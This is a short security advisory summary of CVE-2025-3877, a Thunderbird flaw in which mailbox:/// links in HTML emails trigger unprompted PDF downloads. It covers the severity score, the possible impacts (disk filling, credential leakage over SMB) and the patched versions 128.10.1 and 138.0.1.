CVE-2025-3877: 
Mozilla Thunderbird vulnerability analysis and mitigation

A security vulnerability (CVE-2025-3877) was discovered in Mozilla Thunderbird versions prior to 128.10.1 and 138.0.1, publicly disclosed on May 13, 2025. The vulnerability affects the email client's handling of mailbox:/// links in HTML emails, which can trigger unauthorized automatic downloads of PDF files. The vulnerability was discovered by security researcher Dario Weißer (Mozilla Advisory, Wiz Report).

The vulnerability exploits Thunderbird's handling of mailbox:/// links in HTML emails, allowing automatic downloads of PDF files to the user's desktop or home directory while bypassing normal download prompts and auto-saving settings. The vulnerability has been assigned a CVSS score of 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L) and is classified under CWE-200. While user interaction is required to initiate the download, visual obfuscation techniques can be used to hide the download trigger, and simply viewing the email in HTML mode is sufficient to load external content (Red Hat CVE, Mozilla Advisory).

The vulnerability has multiple potential impacts: it can be exploited to fill the victim's disk with garbage data (for example, using /dev/urandom on Linux systems) or to leak Windows credentials through SMB links when the email is viewed in HTML mode. The automatic nature of the downloads, combined with the ability to bypass security prompts, makes this vulnerability particularly dangerous for targeted attacks (Wiz Report, Mozilla Advisory).

Mozilla has addressed this vulnerability in Thunderbird versions 128.10.1 and 138.0.1. Users are strongly advised to update to these patched versions to protect against potential attacks. Until the update can be applied, users should consider viewing emails in plain text mode to prevent the automatic loading of external content (Mozilla Advisory, Wiz Report).